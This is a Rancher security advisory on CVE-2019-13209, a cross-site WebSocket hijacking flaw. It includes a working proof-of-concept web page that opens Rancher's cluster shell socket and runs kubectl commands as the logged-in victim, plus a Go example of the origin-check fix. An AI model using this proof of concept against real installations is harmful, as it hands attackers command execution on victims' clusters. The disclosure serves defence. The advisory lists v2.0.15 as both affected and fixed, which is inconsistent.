Rancher Security Advisory: Heads up on Rancher CVE-2019-13209


July 12, 2019

This advisory was first communicated by email, on the date mentioned above, to all Rancher customers with a then active support subscription.

Dear Rancher Customer,

This is an advisory heads-up on a security vulnerability discovered in Rancher that affects the following versions of Rancher:

  • v2.0.0-v2.0.15
  • v2.1.0-v2.1.10
  • v2.2.0-v2.2.4

The fix for this vulnerability will be made available in Rancher v2.2.5, v2.1.11, and v2.0.15.  Rancher v1.6 is NOT affected.

The vulnerability is known as a Cross-Site Websocket Hijacking attack (https://www.christian-schneider.net/CrossSiteWebSocketHijacking.html).

This attack allows an exploiter to gain access to clusters managed by Rancher with the roles/permissions of a victim. It requires that a victim be logged into a Rancher server and then access a third-party site hosted by the exploiter. Once that is accomplished, the exploiter is able to execute commands against the Kubernetes API with the permissions and identity of the victim.

Details of this attack are best explained through a proof-of-concept. The following is a proof-of-concept HTML webpage that makes use of the exploit. This page could be hosted on any domain and still be able to access the Rancher installation due to this vulnerability:

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>POC</title>
  </head>
  <body>
    <script>

      const cmd = 'kubectl get pods --all-namespaces';

      // Open a websocket, no auth required with CSWSH
      const socket = new WebSocket('wss://rancher-installation-fqdn/v3/clusters/local?shell=true', 'base64.channel.k8s.io');

      // A similar exploit can be achieved against specific pods in the local or other clusters, but requires the attacker to know cluster and pod IDs
      // const socket = new WebSocket('wss://rancher-installation-fqdn/k8s/clusters/c-zkpzd/api/v1/namespaces/cattle-system/pods/cattle-cluster-agent-dc64696f7-57468/exec?container=cluster-register&stdout=1&stdin=1&stderr=1&tty=1&command=%2Fbin%2Fsh', 'base64.channel.k8s.io');

      // Send the command
      socket.onopen = (event) => {
        socket.send('0' + btoa(cmd + '\x0D'));
      };

      // Listen for the response
      socket.onmessage = (event) => {
        if (event.data.startsWith('1')) {
          console.log(atob(event.data.substring(1)));
        }
      };
    </script>
  </body>
</html>

If the victim is logged into the Rancher server running at "rancher-installation-fqdn" and then accesses this page, the browser's JavaScript console will output the results of the kubectl get pods --all-namespaces command.

To address this issue, we've added origin checking logic to our websocket endpoints. This prevents third-party sites from calling these endpoints.
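The origin check described above works because a browser always attaches an Origin header to a WebSocket handshake, and a page on another domain cannot forge it, even though the browser does attach the victim's cookies. The following Go program is an added illustration of that rule and is not Rancher's own code; it uses only the standard library, the hypothetical hostnames rancher.example.test, dashboard.example.test and attacker.example.test, and an invented allowlist, and it rejects the handshake with 403 before any shell or exec handling could run.

```go
package main

import (
	"crypto/tls"
	"fmt"
	"net/http"
	"net/url"
	"strings"
)

// OriginDecision records whether a WebSocket handshake may proceed and why.
type OriginDecision struct {
	Allowed bool
	Reason  string
}

// isWebSocketUpgrade reports whether the request is an RFC 6455 opening handshake.
func isWebSocketUpgrade(r *http.Request) bool {
	return strings.EqualFold(r.Header.Get("Upgrade"), "websocket") &&
		strings.Contains(strings.ToLower(r.Header.Get("Connection")), "upgrade")
}

// checkOrigin applies the same-origin rule that defeats cross-site WebSocket
// hijacking: the Origin header the browser attaches to the handshake must name
// the host the request was addressed to (r.Host, port included) or appear on
// an explicit allowlist of trusted hosts. It deliberately never consults the
// session cookie, because the cookie is exactly what the attacking page gets for free.
func checkOrigin(r *http.Request, allowlist []string) OriginDecision {
	origin := r.Header.Get("Origin")
	if origin == "" {
		// Browsers always send Origin on a WebSocket handshake. A request without one
		// comes from a non-browser client (kubectl, curl) that authenticates with an
		// explicit token rather than an ambient session, so it is not a CSWSH vector
		// and is handed on to the normal authentication layer.
		return OriginDecision{true, "no Origin header: non-browser client"}
	}
	u, err := url.Parse(origin)
	if err != nil || u.Host == "" {
		// Also covers the literal "null" origin (sandboxed iframes, data: URLs).
		return OriginDecision{false, fmt.Sprintf("unparseable Origin %q", origin)}
	}
	if r.TLS != nil && u.Scheme != "https" {
		// A TLS endpoint must not accept a plaintext origin for the same host.
		return OriginDecision{false, fmt.Sprintf("insecure scheme in Origin %q", origin)}
	}
	if strings.EqualFold(u.Host, r.Host) {
		return OriginDecision{true, "same origin as request Host"}
	}
	for _, trusted := range allowlist {
		if strings.EqualFold(u.Host, trusted) {
			return OriginDecision{true, "Origin on allowlist"}
		}
	}
	return OriginDecision{false, fmt.Sprintf("cross-site Origin %q rejected", origin)}
}

// protectWebSocket wraps a handler so that handshakes failing the origin check are
// refused with 403 before any upgrade happens. Plain HTTP requests pass through.
func protectWebSocket(next http.Handler, allowlist []string) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if isWebSocketUpgrade(r) {
			if d := checkOrigin(r, allowlist); !d.Allowed {
				http.Error(w, "forbidden: "+d.Reason, http.StatusForbidden)
				return
			}
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	// Constructed handshakes against a hypothetical server name; not a real deployment.
	allowlist := []string{"dashboard.example.test"}
	for _, origin := range []string{
		"https://rancher.example.test",  // the user's own Rancher tab
		"https://attacker.example.test", // a third-party page like the PoC above
		"http://rancher.example.test",   // right host, downgraded scheme
		"null",                          // sandboxed or data: origin
		"",                              // kubectl / curl: no Origin at all
	} {
		r, _ := http.NewRequest(http.MethodGet, "https://rancher.example.test/v3/clusters/local?shell=true", nil)
		r.TLS = &tls.ConnectionState{} // model a TLS listener, as a real wss:// endpoint would be
		r.Header.Set("Upgrade", "websocket")
		r.Header.Set("Connection", "Upgrade")
		if origin != "" {
			r.Header.Set("Origin", origin)
		}
		d := checkOrigin(r, allowlist)
		fmt.Printf("Origin=%-32q allowed=%-5v %s\n", origin, d.Allowed, d.Reason)
	}
}
```

The check compares the Origin host against the Host the request was actually addressed to rather than against a hard-coded name, so it keeps working behind a reverse proxy or on a non-standard port; the allowlist is only for a separately hosted UI that legitimately opens sockets to the API.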

Thanks to Matt Belisle and Alex Stevenson at Workiva for reporting this vulnerability. The official CVE, when published next week, will be listed on mitre.org as CVE-2019-13209.

We expect to release v2.2.5, v2.1.11, and v2.0.15, which will include these fixes, next week (week beginning Mon, July 15th).

Stay tuned. We will update you with a follow-up communication closer to the release.

If there are any questions, simply submit a request via this portal referencing this article and we will track and respond to your question as a Support Ticket.

Thanks

Rancher Support Team
